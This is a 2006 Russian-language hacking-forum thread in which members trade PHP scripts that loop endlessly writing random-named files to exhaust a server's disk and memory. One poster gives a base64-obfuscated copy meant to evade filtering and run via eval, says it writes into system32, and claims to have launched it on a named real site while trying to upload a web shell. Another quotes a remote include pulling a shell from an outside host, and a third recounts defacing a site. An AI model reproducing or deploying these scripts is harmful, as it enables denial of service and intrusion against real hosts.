ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.10.2006, 17:24
Аватар для SMiX
SMiX
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850

Репутация: 174
По умолчанию

Я вообще не понимаю, почему все закручено на md5. Случайные названия, состоящие из цифр и букв + случайное расширение из списка(txt dll ini exe log bmp ...)
 

  #12  
Старый 16.10.2006, 19:04
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Вот от этого точно никто не убежит! Набросал за 5 мин.
PHP код:
<?php
// Greetz всем заподлянщикам...
// В частности Poncik'y за идею!!!!!!!
// Вот, после этого, точно зае*ёшся пыль глотать...
//Аминь...
//(C) Dr.Check и все кто помог писать "Знаменитый скрипт"
////////////////////////////////////////////////////////////////
set_time_limit(0);
ignore_user_abort();
echo(
"<center><h1><b><font color=\"green\">ИБО НЕХУЙ!!!</font></b></h1></center>");
/////////////////////////////////////////////////////////////////
    
$name = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','r','s',
                 
't','u','v','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L',
                 
'M','N','O','P','R','S','T','U','V','X','Y','Z','1','2','3','4','5','6',
                 
'7','8','9','0');
//////////////////////////////////////////////////////////////////
    
$rash= array('.txt','.dic','.doc','.xls','.exe','.ini',
                    
'.bat','.log','.dll','.hak','.wmf','.zip','.rar',
                    
'.tar','.gz','.jpg','.gif','.bmp');
/////////////////////////////////////////////////////////////////
while(true) {
    
$perem "";
    
$fuck="";
    for(
$i 0$i rand(20,1); $i++) // количество сиволов в имени файла.
    
{
     
$by rand(0count($name) - 1);
     
$perem .= $name[$by];
    }
    
$rarand(0count($rash)-1);
    
$fuck .= $rash[$ra];
         
$fp=fopen($perem.$fuck,"w");
        
fwrite($fp,php_uname());
        
fclose($fp);
        }
?>
Зав 3-5 сек было создано около 2-3 тыщъ файлов, занята вся оперативка. Даже динамик запищал!!!
Для bul.666 :
PHP код:
 <?php 
// в массив
('(',')','[',']','!','?',
                 
'&','^','%','@','*',','<','>','/','|','+','-','{','}','`','~');
?>

Последний раз редактировалось Dr.Check; 16.10.2006 в 20:57..
 

  #13  
Старый 16.10.2006, 19:09
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Добавте еще символов в массив name.
да и расширения можно $rash ирить =)))
 

  #14  
Старый 16.10.2006, 19:18
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Во, добавил, то, что написал SMiX - md5(time().doubleval(microtime())) терь одинаковых имён точно небудет! Про расширения я ещё утром думал, но забыл... Щас сделаю...
PHP код:
<?
set_time_limit
(0);
ignore_user_abort();
while(
true) {
        switch (
rand(0,8))
        {
           case 
$r '.txt'; break;
           case 
$r '.exe';   break;
           case 
$r '.dat'; break;
           case 
$r '.ini';  break;
           case 
$r '.log'; break;
           case 
$r '.dll'; break;
           case 
$r '.wav';  break;
           case 
$r '.nsc';  break;
           default: 
$r '.zip'; break;
        }
        
$fp=fopen(md5(time().doubleval(microtime())).$r,"w");
        
fwrite($fp,time());
        
fclose($fp);
}
?>
вот
P.S. Ах блин! Пока писал, мну опередили Ничё знаменитого на ачате так и не сделал, Dr.Check мож добавишь тама пару имен в копирайт, все ведь старались, да и хочется знаменитым стать А скрипт офигеный! Ущел жертву искать!

Последний раз редактировалось Ponchik; 16.10.2006 в 19:22..
 

  #15  
Старый 16.10.2006, 19:43
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Цитата:
Dr.Check мож добавишь тама пару имен в копирайт, все ведь старались, да и хочется знаменитым стать

А каких пару имен!?!?? Я сам написал. Тебе спасибо за Идею, и Смиксу за расширения.
 

  #16  
Старый 16.10.2006, 19:57
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

О! Пасибо! Терь я гордый ходить буду
[OFFTOP]
А чё это за ошибка-то? _http://darkmoon.mediazona.ru:4001/modules/admin.php
[/OFFTOP]
 

  #17  
Старый 16.10.2006, 20:05
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Цитата:
А чё это за ошибка-то? _http://darkmoon.mediazona.ru:4001/modules/admin.php
Я думаю, что в сорце самого файла admin.php лежит строчка (в самом верху)
PHP код:
 include("http://mucheat.h10.ru/shell.txt"); 
Но горе хакеры облажались =)
Если смотреть дальше ошибку, то поймете почему =)
 

  #18  
Старый 16.10.2006, 20:43
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Так это я шелл пытаюсь залить, щас чё нить придумаю!
Вот кстати если кому надо зашифрованый этот код в base64 это чтоб фильтрацию обойти, или ещё чего... Файлы будут создаваться в system32...
Вот

c2V0X3RpbWVfbGltaXQoMCk7aWdub3JlX3VzZXJfYWJvcnQoKT tlY2hvKCI8Y2VudGVyPjxoMT48Yj48Zm9udCBjb2xvcj1cImdy ZWVuXCI+Pz8/ID8/Pz8/ITwvZm9udD48L2I+PC9oMT48L2NlbnRlcj4iKTskbmFtZSA9IG FycmF5KCdhJywnYicsJ2MnLCdkJywnZScsJ2YnLCdnJywnaCcs J2knLCdqJywnaycsICAnbCcsJ20nLCduJywnbycsJ3AnLCdyJy wncycsJ3QnLCd1JywndicsJ3gnLCd5JywneicsJ0EnLCdCJywn QycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTC csJ00nLCdOJywnTycsJ1AnLCdSJywnUycsJ1QnLCdVJywnVics J1gnLCdZJywnWicsJzEnLCcyJywnMycsJzQnLCc1JywnNicsJz cnLCc4JywnOScsJzAnKTskcmFzaD0gYXJyYXkoJy50eHQnLCcu ZGljJywnLmRvYycsJy54bHMnLCcuZXhlJywnLmluaScsJy5iYX QnLCcubG9nJywnLmRsbCcsJ2hhaycsJy53bWYnLCcuemlwJywn LnJhcicsJy50YXInLCcuZ3onLCcuanBnJywnLmdpZicsJy5ibX AnKTt3aGlsZSh0cnVlKSB7JHBlcmVtID0gIiI7JGZ1Y2s9IiI7 Zm9yKCRpID0gMDsgJGkgPCByYW5kKDIwLDEpOyAkaSsrKSB7JG J5ID0gcmFuZCgwLCBjb3VudCgkbmFtZSkgLSAxKTskcGVyZW0g Lj0gJG5hbWVbJGJ5XTt9JHJhPSByYW5kKDAsIGNvdW50KCRyYX NoKS0xKTskZnVjayAuPSAkcmFzaFskcmFdOyRmcD1mb3Blbigk cGVyZW0uJGZ1Y2ssInciKTtmd3JpdGUoJGZwLHBocF91bmFtZS gpKTtmY2xvc2UoJGZwKTt9 (пробелы убрать)

Это можно выполнить так: eval(base64_decode('ТУТ_ЭТОТ_КОД'));

Всё, запустил эту штуку на _http://darkmoon.mediazona.ru:4001

Последний раз редактировалось Ponchik; 16.10.2006 в 20:50..
 

  #19  
Старый 16.10.2006, 20:46
Аватар для Trinux
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

пару лет назад нашел небольшой прикол на хостерах. Админы от нечего делать всех своих клиентов писали в одну группу пользователей. таким образом я имел доступ на read к любому юзверю хостера, поимев шелл на одном из них. Я описывал эту багу в ][ на примере небольшого "дефа" glukoza.ru (добавил пару новостей, изменил немного фотоальбом). В общем не суть. тогда я написал скрипт который "листает" все диры и файлы с указанного места и копирует полную структуру на указанный ftp. Скрипт умещался в 20 строк.

Я к тому, что если файлы писать не только в system32, а листать все дерево каталогов на жестком диске и писать везде - будет еще страшнее =)
 

  #20  
Старый 16.10.2006, 21:25
Аватар для Pochka
Pochka
Познающий
Регистрация: 26.11.2005
Сообщений: 32
Провел на форуме:
47872

Репутация: 20
По умолчанию

Уй позорище какое. Что ни скрипт, то позорище!

Щас меня убивать будут
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ